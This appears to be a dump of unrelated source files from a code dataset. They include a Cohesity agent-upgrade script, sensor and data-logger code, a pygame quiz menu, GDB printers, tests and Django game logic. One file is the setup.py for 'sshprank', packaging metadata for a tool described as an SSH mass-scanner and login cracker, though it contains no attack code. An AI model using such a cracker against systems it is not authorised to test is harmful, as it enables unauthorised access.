clusternames:\n print('\\nConnecting to %s...\\n' % clustername)\n if mcm or vip.lower() == 'helios.cohesity.com':\n heliosCluster(clustername)\n\n cluster = api('get', 'cluster')\n\n ### get Physical Servers\n nodes = api('get', 'protectionSources/registrationInfo?environments=kPhysical&environments=kHyperV&allUnderHierarchy=true')\n nodesCounted = 0\n if refresh is True:\n if nodes is not None and 'rootNodes' in nodes and nodes['rootNodes'] is not None:\n for node in nodes['rootNodes']:\n if 'physicalProtectionSource' in node['rootNode']:\n paramkey = node['rootNode']['physicalProtectionSource']\n hostType = paramkey['hostType'][1:]\n osName = node['rootNode']['physicalProtectionSource']['osName']\n if 'hypervProtectionSource' in node['rootNode']:\n paramkey = node['rootNode']['hypervProtectionSource']\n osName = 'HyperV'\n hostType = 'Windows'\n name = node['rootNode']['name']\n hostType = 'unknown'\n errorMessage = ''\n tenant = ''\n if 'entityPermissionInfo' in node['rootNode']:\n if tenant in node['rootNode']['entityPermissionInfo']:\n if 'name' in node['rootNode']['entityPermissionInfo']['tenant']:\n tenant = node['rootNode']['entityPermissionInfo']['tenant']['name']\n try:\n if 'authenticationErrorMessage' in node['registrationInfo'] and node['registrationInfo']['authenticationErrorMessage'] is not None:\n errorMessage = node['registrationInfo']['authenticationErrorMessage'].split(',')[0].split('\\n')[0]\n if 'refreshErrorMessage' in node['registrationInfo'] and node['registrationInfo']['refreshErrorMessage'] is not None and node['registrationInfo']['refreshErrorMessage'] != '':\n errorMessage = node['registrationInfo']['refreshErrorMessage'].split(',')[0].split('\\n')[0]\n except Exception:\n pass\n try:\n hostType = paramkey['hostType'][1:]\n except Exception:\n pass\n if len(agentnames) == 0 or name.lower() in [a.lower() for a in agentnames]:\n if ostype is None or ostype.lower() == hostType.lower():\n if errorMessage == '' or skipwarnings is False:\n print(' Refreshing %s' % name)\n if tenant != '':\n impersonate(tenant)\n result = api('post', 'protectionSources/refresh/%s' % node['rootNode']['id']) # , timeout=timeout, quiet=True)\n if tenant != '':\n switchback()\n nodes = api('get', 'protectionSources/registrationInfo?environments=kPhysical&nodes=kHyperV&allUnderHierarchy=true')\n print('')\n\n if nodes is not None and 'rootNodes' in nodes and nodes['rootNodes'] is not None:\n for node in nodes['rootNodes']:\n tenant = ''\n agentIds = [] # list of agents to upgrade\n name = node['rootNode']['name']\n version = 'unknown'\n hostType = 'unknown'\n osName = 'unknown'\n status = 'unknown'\n errorMessage = ''\n errors = ''\n if 'physicalProtectionSource' in node['rootNode']:\n paramkey = node['rootNode']['physicalProtectionSource']\n hostType = paramkey['hostType'][1:]\n osName = node['rootNode']['physicalProtectionSource']['osName']\n if 'hypervProtectionSource' in node['rootNode']:\n paramkey = node['rootNode']['hypervProtectionSource']\n osName = 'HyperV'\n hostType = 'Windows'\n try:\n thisSource = api('get', 'protectionSources?id=%s' % node['rootNode']['id'])\n if thisSource is not None and len(thisSource) > 0:\n if 'nodes' in thisSource[0] and thisSource[0]['nodes'] is not None and len(thisSource[0]['nodes']) > 0:\n for thisNode in thisSource[0]['nodes']:\n if thisNode['protectionSource']['hypervProtectionSource']['type'] in ['kHostGroup', 'kHostCluster', 'kHypervHost']:\n if 'nodes' in thisNode:\n nodes['rootNodes'].append({\n 'rootNode': thisNode['protectionSource'],\n 'nodes': thisNode['nodes']\n })\n else:\n nodes['rootNodes'].append({\n 'rootNode': thisNode['protectionSource'],\n })\n except Exception:\n pass\n if 'entityPermissionInfo' in node['rootNode']:\n if tenant in node['rootNode']['entityPermissionInfo']:\n if 'name' in node['rootNode']['entityPermissionInfo']['tenant']:\n tenant = node['rootNode']['entityPermissionInfo']['tenant']['name']\n try:\n if 'authenticationErrorMessage' in node['registrationInfo'] and node['registrationInfo']['authenticationErrorMessage'] is not None:\n errorMessage = node['registrationInfo']['authenticationErrorMessage'].split(',')[0].split('\\n')[0]\n if 'refreshErrorMessage' in node['registrationInfo'] and node['registrationInfo']['refreshErrorMessage'] is not None and node['registrationInfo']['refreshErrorMessage'] != '':\n errorMessage = node['registrationInfo']['refreshErrorMessage'].split(',')[0].split('\\n')[0]\n except Exception:\n pass\n if len(agentnames) == 0 or name.lower() in [a.lower() for a in agentnames]:\n if 'agents' in paramkey and paramkey['agents'] is not None and len(paramkey['agents']) > 0:\n for agent in paramkey['agents']:\n if 'version' in agent:\n version = agent['version']\n if 'upgradability' in agent and agent['upgradability'] is not None:\n if agent['upgradability'] == 'kUpgradable':\n status = 'upgradable'\n agentIds.append(agent['id'])\n else:\n status = 'current'\n break\n if ostype is None or ostype.lower() == hostType.lower():\n if len(agentIds) > 0:\n if errorMessage != '':\n errors = '(warning: registration/refresh errors)'\n if skipwarnings is not True or errors == '':\n if execute is True:\n status = 'upgrading'\n print(' %s (%s): upgrading ... %s' % (name, hostType, errors))\n thisUpgrade = {'agentIds': agentIds}\n if tenant != '':\n impersonate(tenant)\n result = api('post', 'physicalAgents/upgrade', thisUpgrade)\n nodesCounted += 1\n if nodesCounted % throttle == 0:\n print(' sleeping for %s seconds' % sleeptime)\n sleep(sleeptime)\n if tenant != '':\n switchback()\n else:\n print(' %s (%s): %s *** %s' % (name, hostType, status, errors))\n reportNextSteps = True\n else:\n if showcurrent is True or name.lower() in [a.lower() for a in agentnames]:\n if 'agents' in paramkey:\n print(' %s (%s): %s %s' % (name, hostType, status, errors))\n f.write('%s,%s,%s,%s,%s,%s,%s,%s\\n' % (cluster['name'], cluster['clusterSoftwareVersion'], name, version, hostType, osName, status, errorMessage))\n\nif reportNextSteps is True:\n print('\\nTo perform the upgrades, rerun the script with the -x (--execute) switch')\n\nf.close()\nprint('\\nOutput saved to %s\\n' % outfile)\n","sub_path":"python/upgradeAgents/upgradeAgents.py","file_name":"upgradeAgents.py","file_ext":"py","file_size_in_byte":12253,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"476028072","text":"\"\"\"Set up sshprank.\"\"\"\nimport os\n\nfrom setuptools import find_packages, setup\n\nhere = os.path.abspath(os.path.dirname(__file__))\n\nwith open(os.path.join(here, \"README.md\"), encoding=\"utf-8\") as readme:\n long_description = readme.read()\n\n\nsetup(\n name=\"sshprank\",\n version=\"1.2.3\",\n description=\"SSH mass-scanner, login cracker and banner grabber tool\",\n long_description=long_description,\n long_description_content_type='text/markdown',\n url=\"https://github.com/noptrix/sshprank\",\n author=\"noptrix\",\n author_email=\"noptrix@nullsecurity.net\",\n maintainer=\"Fabian Affolter\",\n maintainer_email=\"fabian@affolter-engineering.ch\",\n license=\"MIT\",\n install_requires=[\"paramiko\", \"shodan\", \"python-masscan\"],\n packages=find_packages(),\n zip_safe=True,\n include_package_data=True,\n entry_points={\"console_scripts\": [\" sshprank=sshprank:main\"]},\n keywords=\"ssh scanner login cracker\",\n classifiers=[\n \"Development Status :: 3 - Alpha\",\n \"Environment :: Console\",\n \"Intended Audience :: Developers\",\n \"License :: OSI Approved :: MIT License\",\n \"Operating System :: MacOS :: MacOS X\",\n \"Operating System :: Microsoft :: Windows\",\n \"Operating System :: POSIX\",\n \"Programming Language :: Python :: 3.8\",\n \"Programming Language :: Python :: 3.9\",\n \"Topic :: Utilities\",\n ],\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1391,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"468590108","text":"#Definition for a binary tree node.\nclass TreeNode(object):\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\nclass Solution(object):\n def invertTree(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: TreeNode\n \"\"\"\n\n if not root:\n return None\n temp = self.invertTree(root.left)\n root.left = self.invertTree(root.right)\n root.right = temp\n if root.left:\n print('left of ' + str(root.val) + ' is ' + str(root.left.val))\n print('right of ' + str(root.val) + ' is ' + str(root.right.val))\n return root\n\nclass Tests(object):\n def testOne(self):\n a = TreeNode(4)\n b = TreeNode(2)\n c = TreeNode(7)\n a.left = b\n a.right = c\n d = TreeNode(1)\n e = TreeNode(3)\n b.left = d\n b.right = e\n f = TreeNode(6)\n g = TreeNode(9)\n c.left = f\n c.right = g\n\n s = Solution()\n s.invertTree(a)\n\nif __name__ == '__main__':\n # begin\n t = Tests()\n t.testOne()\n\n\n\n\n\n","sub_path":"Leetcode-Python/226-Invert-Binary-Tree.py","file_name":"226-Invert-Binary-Tree.py","file_ext":"py","file_size_in_byte":1111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"287426738","text":"import Data_logger as dl\nimport os.path\nimport pytest\nimport RPi.GPIO as gpio\nimport os\n\n#it will always a positive number as North/South and East/West \ndef test_gps_format():\n\t# 5224.9671 (DDMM.MMMM) 52 + 24.9671/60\n\t# format will always be 8 digits\n\texpected = format(52 + 24.9671/60,'.5f')\n\tassert expected == dl.change_format_of_GPS(5224.9671)\n\texpected = format(00 + 00.0000/60,'.5f')\n\tassert expected == dl.change_format_of_GPS(0000.0000)\n#test setting up the directory\ndef test_set_up_dir():\n\t#file and directory should be created\n\tfile = dl.set_up_dir()\n\t#check it exists\n\tresult = os.path.isfile(file)\n\t#remove it\n\tos.remove(file)\n\t#check result before the file was removed\n\tassert result\n\t\n\t#test check_previous_file function\ndef test_check_previous_file():\n\t#create file\n\tfile = dl.set_up_dir()\n\t#check it exists\n\tassert os.path.isfile(file)\n\t#run method\n\tdl.check_previous_files()\n\t#check filename has been replaced\n\tresult = os.path.isfile(file.replace('~',''))\n\t#remove file\n\tos.remove(file.replace('~',''))\n\t#test result\n\tassert result\n\t\n#test i2c functions\ndef test_i2c():\n\t#set board mode\n\tgpio.setmode(gpio.BCM)\n\tgpio.setup(24,gpio.OUT)\n\t#setup i2c\n\tpi, handle = dl.set_up_i2c()\n\t#get message from device\n\tair_quality_message = dl.get_air_quality_data(pi,handle)\n\t#check message length\n\tassert len(air_quality_message) == 9\n\t#check the air quality sensor is in ready mode\n\tassert air_quality_message[2] == 0x00\n\t#databytes will never be negative (0 at the least)\n\t#test conversion\n\tco2 , toc = dl.translate_air_data([0,0,0,0,0,0,0,0,0])\n\tassert co2 == 0\n\tassert toc == 0\n\tco2 , toc = dl.translate_air_data([99,99,99,99,99,99,99,99,99])\n\tassert co2 == 25443\n\tassert toc == 25443\n\tco2 , toc = dl.translate_air_data([99,0,0,0,0,0,0,5,7])\n\tassert co2 == 25344\n\tassert toc == 1287\n#test UART functions\ndef test_serial():\n\t#set board mode\n\tgpio.setmode(gpio.BCM)\n\tgpio.setup(24,gpio.OUT)\n\t#set up serial\n\tserial = dl.set_up_serial()\n\t#check connection has been made\n\tassert serial.is_open\n\t#test if message has been recieved\n\tmessage = dl.get_and_translate_gpgga(serial)\n\n\tassert message.get(\"position_fix_indicator\") is '1'\n\n#test logging function\ndef test_start_logging():\n\t#create file\n\tfile_path = dl.set_up_dir()\n\t#open the file - in append mode\n\tfile = open(file_path,'a')\n\t#set board mode\n\tgpio.setmode(gpio.BCM)\n\tgpio.setup(24,gpio.OUT)\n\t#set up serial\n\tserial = dl.set_up_serial()\n\t#set up i2c\n\tpi, handle = dl.set_up_i2c()\n\t#run logging method once\n\tdl.start_logging(file, serial,pi,handle)\n\t#close file\n\tfile.close()\n\t#test how many lines are written (should be 2)\n\t#headings and a data line\n\twith open(file_path) as f:\n\t\tlines = sum(1 for _ in f)\n\t#os.remove(file_path)\n\tprint(file_path)\n\tassert 2 == lines\n\t","sub_path":"Src/Monitoring/Data_logger_test.py","file_name":"Data_logger_test.py","file_ext":"py","file_size_in_byte":2732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"261931868","text":"import time\nimport RPi.GPIO as GPIO\n\nGPIO.setmode(GPIO.BCM)\n\nPOWER_PIN = 21\nSPICLK = 18\nSPIMISO = 23\nSPIMOSI = 24\nSPICS = 25\n\nPAUSE = 0.1\n\n# read SPI data from MCP3008 chip, 8 possible adc's (0 thru 7)\ndef readadc(adcnum, clockpin, mosipin, misopin, cspin):\n if ((adcnum > 7) or (adcnum < 0)):\n return -1\n GPIO.output(cspin, True)\n\n GPIO.output(clockpin, False) # start clock low\n GPIO.output(cspin, False) # bring CS low\n\n commandout = adcnum\n commandout |= 0x18 # start bit + single-ended bit\n commandout <<= 3 # we only need to send 5 bits here\n for i in range(5):\n if (commandout & 0x80):\n GPIO.output(mosipin, True)\n else:\n GPIO.output(mosipin, False)\n commandout <<= 1\n GPIO.output(clockpin, True)\n GPIO.output(clockpin, False)\n\n adcout = 0\n # read in one empty bit, one null bit and 10 ADC bits\n for i in range(12):\n GPIO.output(clockpin, True)\n GPIO.output(clockpin, False)\n adcout <<= 1\n if (GPIO.input(misopin)):\n adcout |= 0x1\n\n GPIO.output(cspin, True)\n\n adcout >>= 1 # first bit is 'null' so drop it\n return adcout\n\n\ndef spi_setup():\n GPIO.setup(SPIMOSI, GPIO.OUT)\n GPIO.setup(SPIMISO, GPIO.IN)\n GPIO.setup(SPICLK, GPIO.OUT)\n GPIO.setup(SPICS, GPIO.OUT)\n GPIO.setup(POWER_PIN, GPIO.OUT)\n\n\ndef spi_readout(adc_pin):\n # read the analog pin\n return readadc(adc_pin, SPICLK, SPIMOSI, SPIMISO, SPICS)\n\n\ndef power_on():\n\n GPIO.output(POWER_PIN, True)\n\n\ndef power_off():\n GPIO.output(POWER_PIN, False)\n\n\ndef adc_to_temp(readout):\n millivolts = readout * (3300.0 / 1024.0)\n temp_c = ((millivolts - 100.0) / 10.0) - 40.0\n return temp_c\n\nif __name__ == \"__main__\":\n HYGROMETER = 0\n TEMP = 1\n LIGHT = 2\n spi_setup()\n power_on()\n time.sleep(PAUSE)\n print(\"Hygrometer value %d\" % spi_readout(HYGROMETER))\n power_off()\n time.sleep(PAUSE)\n temp = adc_to_temp(spi_readout(TEMP))\n print(\"Temp sensor: %.1f C\" % temp)\n time.sleep(PAUSE)\n light_level = (float(spi_readout(LIGHT))/1024.0) * 100.0\n print(\"Light level {}% \".format(light_level))\n GPIO.cleanup()\n","sub_path":"source/0004_light_temp_moisture.py","file_name":"0004_light_temp_moisture.py","file_ext":"py","file_size_in_byte":2366,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"404642979","text":"from functools import partial\nfrom typing import Callable\n\nimport pygame\n\nfrom input_data import InputParser\nfrom main_game import Game\nfrom rounds import Round\nfrom setup_environment import SetupEnvironment\nfrom text_surface_rectangle import Colors, TextRec\n\n\nclass MenuPage:\n menu_txt = \"Menu Page\"\n sc_button_txt = \"Science quiz\"\n math_button_txt = \"Math quiz\"\n\n def _create_menu_button_settings(self):\n list_of_buttons = list()\n for text in [self.sc_button_txt, self.math_button_txt]:\n button = self.default_surface_settings.copy()\n button.update(\n {\"text\": text, \"y\": self.setup.req_height, \"x\": self.setup.padding}\n )\n list_of_buttons.append(button)\n return list_of_buttons\n\n def __init__(self, setup: Callable):\n # For menu buttons box number should be 3\n self.setup = setup(box_number=3)\n self.default_surface_settings = {\n \"x\": None,\n \"y\": None,\n \"color\": Colors.color_green,\n \"font_size\": 100,\n \"font_name\": \"arial\",\n \"text\": \"\",\n }\n\n # Menu button and menu title surface settings\n self.title_surface_settings = self.default_surface_settings.copy()\n self.title_surface_settings.update(\n {\n \"x\": self.setup.padding,\n \"y\": self.setup.req_question_y,\n \"color\": Colors.color_light_yellow,\n \"text\": self.menu_txt,\n }\n )\n\n self.menu_button_setting_list = self._create_menu_button_settings()\n self.all_surfaces_settings = [\n self.title_surface_settings\n ] + self.menu_button_setting_list\n\n self.title_surface, *self.button_surfaces = self.setup.create_text_boxes(\n TextRec, self.all_surfaces_settings\n )\n\n def draw(self, display):\n self.title_surface.draw(display)\n for button in self.button_surfaces:\n button.draw(display)\n\n def _event_button_pressed(self, event):\n for button in self.button_surfaces:\n if button.rect.collidepoint(*event.pos):\n return button\n return None\n\n def _check_button_text(self, button):\n if not button:\n return False\n return button.text == self.sc_button_txt\n\n def change_button_color(self, button, color, display):\n button.rect_surf.fill(color)\n button.draw(display)\n pygame.display.flip()\n\n def check_selected_field(self, event):\n button = self._event_button_pressed(event)\n if self._check_button_text(button):\n return button\n\n def loop(self, display, game, round_list):\n done = True\n while done:\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n done = False\n\n elif event.type == pygame.MOUSEBUTTONUP:\n pressed = self.check_selected_field(event)\n\n if pressed:\n self.change_button_color(pressed, Colors.color_blue, display)\n pygame.time.delay(200)\n game.main_loop(round_list)\n self.change_button_color(pressed, Colors.color_green, display)\n\n display.fill(Colors.color_light_yellow)\n self.draw(display)\n pygame.display.flip()\n\n pygame.quit()\n\n\nif __name__ == \"__main__\":\n parser = InputParser(text_file=\"INPUT_natural_science.txt\")\n data = parser.store_data()\n\n game_ = Game(win_w=800, win_h=800)\n setup_ = partial(SetupEnvironment, win_width=game_.width, win_height=game_.height)\n menu_ = MenuPage(setup=setup_)\n round_lst = [Round(setup=setup_, question=q, answer=a) for q, a in data]\n menu_.loop(game_.display, game_, round_lst)\n","sub_path":"menu_page.py","file_name":"menu_page.py","file_ext":"py","file_size_in_byte":3853,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"21755726","text":"# -*- tab-width: 4; indent-tabs-mode: nil; py-indent-offset: 4 -*-\n# Helper classes for working with Boost.Unordered.\n#\n# This file is part of boost-gdb-printers.\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation; either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. If not, see <http://www.gnu.org/licenses/>.\n\nimport gdb\nimport six\n\nclass Unordered(object):\n '''Common representation of Boost.Unordered types'''\n\n def __init__(self, value, extractor):\n self.value = value\n self.extractor = extractor\n self.node_type = None\n self.value_type = None\n self.extra_node = False\n self._init()\n\n def __len__(self):\n table = self.value['table_']\n if table['buckets_']:\n return int(table['size_'])\n else:\n return 0\n\n def __iter__(self):\n table = self.value['table_']\n buckets = table['buckets_']\n if buckets:\n start_bucket = buckets + table['bucket_count_']\n start_node = start_bucket.dereference()['next_']\n if self.extra_node:\n start_node = start_node.dereference()['next_']\n return self._iterator(start_node, self.node_type, self.value_type, self.extractor)\n else:\n return iter([])\n\n def empty(self):\n return not self.value['table_']['buckets_']\n\n def _init(self):\n table = self.value['table_'].type.fields()[0]\n assert table.is_base_class\n buckets = table.type.fields()[0]\n assert buckets.is_base_class\n\n alloc_type = buckets.type.template_argument(0)\n self.value_type = alloc_type.template_argument(0)\n\n bucket_type = buckets.type.template_argument(1).strip_typedefs()\n self.extra_node = (str(bucket_type) == 'boost::unordered::detail::bucket')\n\n self.node_type = buckets.type.template_argument(2)\n\n class _iterator(six.Iterator):\n '''Iterator for Boost.Unordered types'''\n\n def __init__(self, start_node, node_type, value_type, extractor):\n assert start_node\n self.node = None\n self.next_node = start_node\n self.node_type = node_type\n self.value_type = value_type\n self.extractor = extractor\n\n def __iter__(self):\n return self\n\n def __next__(self):\n # sorry, no next node available\n if not self.next_node or self.next_node == self.node:\n raise StopIteration()\n\n # fetch next node\n self.node = self.next_node\n self.next_node = self.node.dereference()['next_']\n\n mapped = self._value()\n return (self.extractor.key(mapped), self.extractor.value(mapped))\n\n def _value(self):\n assert self.node\n node = self.node.dereference().cast(self.node_type)\n return node['data_'].cast(self.value_type)\n\nclass Map(Unordered):\n\n def __init__(self, value):\n super(Map, self).__init__(value, self._extractor())\n\n class _extractor(object):\n\n def key(self, node):\n return node['first']\n\n def value(self, node):\n return node['second']\n\nclass Set(Unordered):\n\n def __init__(self, value):\n super(Set, self).__init__(value, self._extractor())\n\n class _extractor(object):\n\n def key(self, node):\n return None\n\n def value(self, node):\n return node\n\n# vim:set filetype=python shiftwidth=4 softtabstop=4 expandtab:\n","sub_path":"boost/share/boost-gdb-printers/boost/v1_48/lib/unordered.py","file_name":"unordered.py","file_ext":"py","file_size_in_byte":3979,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"418360184","text":"import pytest\n\nfrom smartsim import Experiment\nfrom smartsim.error import EntityExistsError\nfrom smartsim.settings import RunSettings\n\n\ndef test_register_incoming_entity_preexists():\n exp = Experiment(\"experiment\", launcher=\"local\")\n rs = RunSettings(\"python\", exe_args=\"sleep.py\")\n ensemble = exp.create_ensemble(name=\"ensemble\", replicas=1, run_settings=rs)\n m = exp.create_model(\"model\", run_settings=rs)\n m.register_incoming_entity(ensemble[\"ensemble_0\"])\n assert len(m.incoming_entities) == 1\n with pytest.raises(EntityExistsError):\n m.register_incoming_entity(ensemble[\"ensemble_0\"])\n\n\ndef test_disable_key_prefixing():\n exp = Experiment(\"experiment\", launcher=\"local\")\n rs = RunSettings(\"python\", exe_args=\"sleep.py\")\n m = exp.create_model(\"model\", run_settings=rs)\n m.disable_key_prefixing()\n assert m.query_key_prefixing() == False\n\n\ndef test_repr():\n expr = Experiment(\"experiment\")\n m = expr.create_model(\"test_model\", run_settings=RunSettings(\"python\"))\n assert m.__repr__() == \"test_model\"\n\n\ndef test_str():\n expr = Experiment(\"experiment\")\n rs = RunSettings(\"python\", exe_args=\"sleep.py\")\n m = expr.create_model(\"test_model\", run_settings=rs)\n entity_str = \"Name: \" + m.name + \"\\nType: \" + m.type + \"\\n\" + str(rs)\n assert m.__str__() == entity_str\n","sub_path":"tests/test_model.py","file_name":"test_model.py","file_ext":"py","file_size_in_byte":1329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"630923856","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Wed Dec 21 15:06:33 2011\r\n\r\n@author: Vladimir\r\n\"\"\"\r\n\r\nfrom xml.etree import cElementTree as etree\r\nfrom urllib2 import urlopen\r\n\r\n# путь с именем файла, где все имена для проверки в формате FISH1+FISH2\r\n# в 1 колонке, а каждый вид с новой строки\r\n# (path to separated by newline list of species scientific names, which you want\r\n# to check for validity, e.g. \"Theragra+chalcogramma\\n\")\r\nINfile = 'C:/pysyn/listnames.txt'\r\n# путь и имя файла вывода результатов\r\n# (path to file for results)\r\nOUTfile = open('C:/pysyn/CoLanswers.txt', 'w')\r\n# write header with col names\r\nOUTfile.write('sp,stat,url\\n')\r\n# базовая часть ссылки для запроса имён в каталоге жизни\r\nbaseUrl = \"http://www.catalogueoflife.org/col/webservice?name=\"\r\n\r\ndef ask_CoL(url):\r\n tree = etree.parse(urlopen(url))\r\n el = tree.find('result')\r\n if el is not None:\r\n lst = [el.findtext(tag) or '' for tag in \"name name_status url\".split()]\r\n return ','.join(lst)\r\n else:\r\n return 'NA'\r\n\r\n\r\ndef main():\r\n # получаем лист имён\r\n # read into list species names\r\n names = open(INfile).read().splitlines()\r\n\r\n # пошли по списку получать ответы каталога жизни\r\n \r\n for askSp in names:\r\n url = baseUrl + askSp\r\n string=ask_CoL(url)\r\n if string is not 'NA':\r\n print(str(names.index(askSp)) + ' - done - ' + askSp)\r\n OUTfile.write(string)\r\n else:\r\n print(str(names.index(askSp)) + ' --- NA - ' + askSp)\r\n OUTfile.close\r\n \r\n# Standard boilerplate to call the main() function to begin\r\n# the program.\r\nif __name__ == '__main__':\r\n main()\r\n","sub_path":"asknames.py","file_name":"asknames.py","file_ext":"py","file_size_in_byte":1858,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"498351605","text":"import pandas as pd\nimport numpy as np\nfrom .models import *\nimport random\nfrom decimal import Decimal\nimport re\n###################################################################\n\n###################################################################\n\"\"\"\nEventos\n\"\"\"\n\ndef modifyEvento(user, eventos):\n if eventos != None:\n for evento in eventos:\n if evento != {}:\n changefrecuencia = Evento_User.objects.get(User=user.id, Evento=evento['Evento_id'])\n Evento_User.objects.filter(User=user.id, Evento=evento['Evento_id']).update(Frecuencia=changefrecuencia.Frecuencia - 1)\n \ndef eventoAfecta(user, eventos):\n afectaList = []\n\n if eventos != None:\n for evento in eventos:\n if evento != {}:\n afecta_evento = Evento_Afecta.objects.filter(Evento=evento['Evento_id'])\n for afecta in afecta_evento:\n tipoAfecta = afectaInversion(afecta, user)\n if tipoAfecta:\n duracion = Periodo.objects.filter(TipoPeriodo=afecta.Periodo).first()\n afecta_usuario = Afecta_user(User=user, Descripcion=evento[\"Descripcion\"], Afecta=afecta.Afecta, TurnosEsperar=duracion.Turnos, TurnosRestante=duracion.Turnos, Cantidad=afecta.Cantidad, Duracion=afecta.Duracion)\n afecta_usuario.save()\n afectaList.append(afecta_usuario.id)\n return afectaList\n\ndef getAfectaEvento(response):\n\n for i in response:\n if i != {}:\n i['Afecta'] = []\n evento = Evento.objects.filter(id = i[\"Evento_id\"]).first()\n afectas = Evento_Afecta.objects.filter(Evento = evento)\n for afecta in afectas:\n periodo = str(afecta.Periodo)\n if afecta.Periodo.Turnos < 0:\n periodo = \"Exclusivo\"\n duracion = afecta.Duracion\n if afecta.Duracion > 1000:\n duracion = \"Infinito\"\n i['Afecta'].append({\"Afecta\": afecta.Afecta.TipoAfect, \"Cantidad\": afecta.Cantidad, \"Periodo\":periodo, \"Duracion\":duracion})\n\n\ndef verificarRequisitos(id, turno, flag_tipo):\n if(flag_tipo == 'Pregunta'):\n requisitos = Preguntas_Requisitos.objects.filter(Preguntas_id = id)\n else:\n requisitos = Evento_Requisitos.objects.filter(Evento = id)\n if not requisitos:\n return True\n else:\n for requisito in requisitos:\n req = str(requisito.Requisito)\n cant = str(requisito.Cantidad)\n if (req == 'Felicidad'):\n if(cant[0] == '>'):\n if(turno.Felicidad > int(cant.split('>')[1])):\n pass\n else:\n return False\n elif(cant[0] == '<'):\n if(turno.Felicidad < int(cant.split('<')[1])):\n pass\n else:\n return False\n elif(cant.find('-') > 0):\n if ((turno.Felicidad >= int(cant.split('-')[0])) and (turno.Felicidad <= int(cant.split('-')[1]))):\n pass\n else:\n return False\n elif(cant[0] == '='):\n if (turno.Felicidad == int(cant.split('=')[1]) ):\n pass\n else:\n return False\n \n elif (req == 'Ingresos'):\n if(cant[0] == '>'):\n if(turno.Ingresos > int(cant.split('>')[1])):\n pass\n else:\n return False\n elif(cant[0] == '<'):\n if(turno.Ingresos < int(cant.split('<')[1])):\n pass\n else:\n return False\n elif(cant[0] == '='):\n if(turno.Ingresos < int(cant.split('=')[1])):\n pass\n else:\n return False\n elif(cant.find('-') > 0):\n if ((turno.Ingresos >= int(cant.split('-')[0])) and (turno.Ingresos <= int(cant.split('-')[1]))):\n pass\n else:\n return False\n \n elif (req == 'NumeroTurnos'):\n if(cant[0] == '>'):\n if(turno.NumeroTurnos > int(cant.split('>')[1])):\n pass\n else:\n return False\n elif(cant[0] == '<'):\n if(turno.NumeroTurnos < int(cant.split('<')[1])):\n pass\n else:\n return False\n elif(cant[0] == '='):\n if(turno.NumeroTurnos < int(cant.split('=')[1])):\n pass\n else:\n return False\n elif(cant.find('-') > 0):\n if ((turno.NumeroTurnos >= int(cant.split('-')[0])) and (turno.NumeroTurnos <= int(cant.split('-')[1]))):\n pass\n else:\n return False\n elif (req == 'DineroEfectivo'):\n if(cant[0] == '>'):\n if(turno.NumeroTurnos > int(cant.split('>')[1])):\n pass\n else:\n return False\n elif(cant[0] == '<'):\n if(turno.NumeroTurnos < int(cant.split('<')[1])):\n pass\n else:\n return False\n elif(cant[0] == '='):\n if(turno.NumeroTurnos < int(cant.split('=')[1])):\n pass\n else:\n return False\n elif(cant.find('-') > 0):\n if ((turno.NumeroTurnos >= int(cant.split('-')[0])) and (turno.NumeroTurnos <= int(cant.split('-')[1]))):\n pass\n else:\n return False\n elif (req == 'Egresos'):\n if(cant[0] == '>'):\n if(turno.Egresos > int(cant.split('>')[1])):\n pass\n else:\n return False\n elif(cant[0] == '<'):\n if(turno.Egresos < int(cant.split('<')[1])):\n pass\n else:\n return False\n elif(cant[0] == '='):\n if(turno.Egresos < int(cant.split('=')[1])):\n pass\n else:\n return False\n elif(cant.find('-') > 0):\n if ((turno.Egresos >= int(cant.split('-')[0])) and (turno.Egresos <= int(cant.split('-')[1]))):\n pass\n else:\n return False\n return True\n\ndef getSeleccion(queryset, tipoEvento, eventos, turno):\n df = pd.DataFrame(list(queryset.values()))\n df['FrecuenciaAcumulada'] = df['Frecuencia'].cumsum()\n limite_inferior = df['FrecuenciaAcumulada'].min()\n limite_superior = df['FrecuenciaAcumulada'].max()\n seleccion = random.uniform(limite_inferior,limite_superior)\n df = df.sample(frac=1).reset_index(drop=True)\n for index, row in df.iterrows():\n if ((row['FrecuenciaAcumulada'] >= seleccion) and (verificarRequisitos(row['Evento_id'], turno,'Evento'))):\n desc = Evento.objects.get(id=row['Evento_id'])\n desc = str(desc.Descripcion)\n temp = row[['Evento_id']].to_dict()\n temp['Descripcion'] = desc\n if(tipoEvento == 'Micro'):\n temp['TipoEvento'] = 'Micro'\n eventos.append(temp)\n break\n else:\n temp['TipoEvento'] = 'Macro'\n eventos.append(temp)\n break\n else:\n pass\n\n\n\ndef seleccionEvento(user):\n turno = Turnos.objects.filter(User=user).first()\n eventos = []\n seleccion = 0\n eventosDisp = Evento_User.objects.values_list('Evento','Frecuencia','TipoEvento').exclude(Frecuencia=0)\n micro_id = TipoEvento.objects.get(TipoEvento = 'Micro').pk\n query_micro = eventosDisp.filter(TipoEvento=micro_id, User=user)\n if not query_micro:\n return eventos.append({})\n getSeleccion(query_micro, 'Micro', eventos, turno)\n seleccion = 